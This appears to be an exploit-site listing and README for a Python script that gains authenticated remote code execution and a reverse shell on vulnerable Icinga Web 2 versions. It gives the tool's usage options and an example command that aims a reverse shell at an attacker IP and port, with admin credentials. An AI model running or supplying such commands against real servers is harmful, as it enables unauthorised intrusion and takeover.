Share
## https://sploitus.com/exploit?id=FE48662D-4928-5A89-A7D2-9131D5A2325F
Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10
# Remote command execution
[](https://asciinema.org/a/595672)
# Reverse shell
[](https://asciinema.org/a/595675)
# Usage
```
usage: exploit.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT
Welcome.
options:
-h, --help show this help message and exit
-u URL, --url URL Insert URL http://ip_victima
-U USER, --user USER Insert user -U user
-P PASSWORD, --password PASSWORD
Insert password -P password
-i IP, --ip IP Insert IP_ATTACK -i IP
-p PORT, --port PORT Insert PORT_ATTACK -p PORT
```
# example
```
python3 exploit.py -u http://localhost -U admin -P admin123 -i 192.168.1.1 -p 443
```